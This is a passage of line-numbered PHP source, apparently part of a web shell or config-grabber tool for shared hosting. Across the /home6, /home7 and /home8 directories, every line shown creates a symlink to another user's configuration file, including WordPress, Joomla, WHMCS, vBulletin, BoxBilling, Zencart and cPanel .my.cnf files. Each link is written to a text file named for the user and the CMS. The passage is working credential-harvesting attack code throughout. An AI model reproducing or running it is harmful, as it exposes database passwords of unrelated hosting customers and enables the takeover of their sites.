  1981. @symlink('/home6/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1982. @symlink('/home6/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home6/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home6/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home6/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home6/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1987. @symlink('/home6/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home6/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home6/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home6/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1991. @symlink('/home6/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home6/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home6/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home6/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home6/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home6/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home6/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home6/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home6/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home6/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2005. @symlink('/home6/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2006. @symlink('/home6/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2007. @symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2008. @symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2009. @symlink('/home6/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2010. @symlink('/home6/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2011. @symlink('/home6/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2012. @symlink('/home6/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2013. @symlink('/home6/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2014. @symlink('/home6/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2015. @symlink('/home6/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2016. @symlink('/home6/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2017. @symlink('/home6/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2018. @symlink('/home6/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2019. @symlink('/home6/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2020. @symlink('/home6/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2021. @symlink('/home6/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2022. @symlink('/home6/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2023. @symlink('/home6/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2024. @symlink('/home6/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2025. @symlink('/home6/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2026. @symlink('/home6/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2027. @symlink('/home6/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2028. @symlink('/home6/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2029. @symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2030. @symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2031. @symlink('/home6/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2032. @symlink('/home6/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2033. @symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2034. @symlink('/home6/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2035. @symlink('/home6/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2036. @symlink('/home6/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2037. @symlink('/home6/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2038. @symlink('/home6/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2039. @symlink('/home6/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2040. @symlink('/home6/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2041. @symlink('/home6/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2042. @symlink('/home6/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2043. @symlink('/home6/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2044. @symlink('/home6/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2045. @symlink('/home6/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2046. @symlink('/home6/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2047. @symlink('/home6/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2048. @symlink('/home6/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2049. @symlink('/home6/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2050. @symlink('/home6/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2051. @symlink('/home6/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2052. @symlink('/home6/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2053. @symlink('/home6/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2054.  
  2055. //home 7
  2056.  
  2057. @symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2058. @symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2059. @symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2060. @symlink('/home7/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2061. @symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2062. @symlink('/home7/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2063. @symlink('/home7/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2064. @symlink('/home7/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2065. @symlink('/home7/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2066. @symlink('/home7/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2067. @symlink('/home7/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2068. @symlink('/home7/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2069. @symlink('/home7/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2070. @symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2071. @symlink('/home7/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2072. @symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2073. @symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2074. @symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2075. @symlink('/home7/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2076. @symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2077. @symlink('/home7/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2078. @symlink('/home7/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2079. @symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2080. @symlink('/home7/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2081. @symlink('/home7/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2082. @symlink('/home7/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2083. @symlink('/home7/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2084. @symlink('/home7/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2085. @symlink('/home7/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2086. @symlink('/home7/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2087. @symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2088. @symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2089. @symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2090. @symlink('/home7/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2091. @symlink('/home7/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2092. @symlink('/home7/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2093. @symlink('/home7/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2094. @symlink('/home7/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2095. @symlink('/home7/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2096. @symlink('/home7/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2097. @symlink('/home7/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2098. @symlink('/home7/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2099. @symlink('/home7/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2100. @symlink('/home7/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2101. @symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2102. @symlink('/home7/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2103. @symlink('/home7/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home7/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home7/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home7/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home7/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home7/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home7/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home7/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home7/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home7/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home7/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home7/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home7/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home7/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home7/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home7/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home7/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home7/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home7/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home7/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2128. @symlink('/home7/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2129. @symlink('/home7/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2130. @symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2131. @symlink('/home7/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2132. @symlink('/home7/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2133. @symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2134. @symlink('/home7/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2135. @symlink('/home7/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home7/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home7/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home7/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home7/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home7/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home7/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home7/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home7/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home7/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home7/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home7/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home7/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home7/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home7/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home7/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home7/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2155. @symlink('/home7/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home7/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home7/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home7/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home7/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home7/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home7/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home7/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home7/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home7/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home7/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home7/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home7/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home7/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home7/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home7/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home7/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home7/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home7/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home7/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home7/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home7/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home7/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home7/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home7/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home7/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home7/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home7/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2190. @symlink('/home7/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home7/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home7/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home7/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2196. @symlink('/home7/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2197. @symlink('/home7/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2198. @symlink('/home7/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2199. @symlink('/home7/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2200. @symlink('/home7/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2201. @symlink('/home7/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2202. @symlink('/home7/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2203. @symlink('/home7/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2204. @symlink('/home7/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2205. @symlink('/home7/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2206. @symlink('/home7/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2207. @symlink('/home7/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2208. @symlink('/home7/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2209. @symlink('/home7/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2210. @symlink('/home7/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2211. @symlink('/home7/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2212. @symlink('/home7/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2213. @symlink('/home7/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2214. @symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2215. @symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2216. @symlink('/home7/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2217. @symlink('/home7/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2218. @symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2219. @symlink('/home7/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2220. @symlink('/home7/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2221. @symlink('/home7/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2222. @symlink('/home7/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2223. @symlink('/home7/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2224. @symlink('/home7/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2225. @symlink('/home7/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2226. @symlink('/home7/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2227. @symlink('/home7/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2228. @symlink('/home7/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2229. @symlink('/home7/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2230. @symlink('/home7/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2231. @symlink('/home7/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2232. @symlink('/home7/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2233. @symlink('/home7/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2234. @symlink('/home7/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2235. @symlink('/home7/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2236. @symlink('/home7/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2237. @symlink('/home7/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2238. @symlink('/home7/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2239.  
  2240. //home 8
  2241.  
  2242. @symlink('/home8/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2243. @symlink('/home8/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2244. @symlink('/home8/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2245. @symlink('/home8/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2246. @symlink('/home8/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2247. @symlink('/home8/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2248. @symlink('/home8/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2249. @symlink('/home8/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2250. @symlink('/home8/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2251. @symlink('/home8/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2252. @symlink('/home8/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2253. @symlink('/home8/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2254. @symlink('/home8/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2255. @symlink('/home8/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2256. @symlink('/home8/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2257. @symlink('/home8/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2258. @symlink('/home8/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2259. @symlink('/home8/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2260. @symlink('/home8/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2261. @symlink('/home8/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2262. @symlink('/home8/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2263. @symlink('/home8/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2264. @symlink('/home8/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2265. @symlink('/home8/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2266. @symlink('/home8/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2267. @symlink('/home8/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2268. @symlink('/home8/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2269. @symlink('/home8/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2270. @symlink('/home8/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2271. @symlink('/home8/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2272. @symlink('/home8/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2273. @symlink('/home8/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2274. @symlink('/home8/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2275. @symlink('/home8/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2276. @symlink('/home8/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2277. @symlink('/home8/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2278. @symlink('/home8/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2279. @symlink('/home8/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2280. @symlink('/home8/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2281. @symlink('/home8/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2282. @symlink('/home8/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2283. @symlink('/home8/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2284. @symlink('/home8/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2285. @symlink('/home8/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2286. @symlink('/home8/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2287. @symlink('/home8/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2288. @symlink('/home8/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
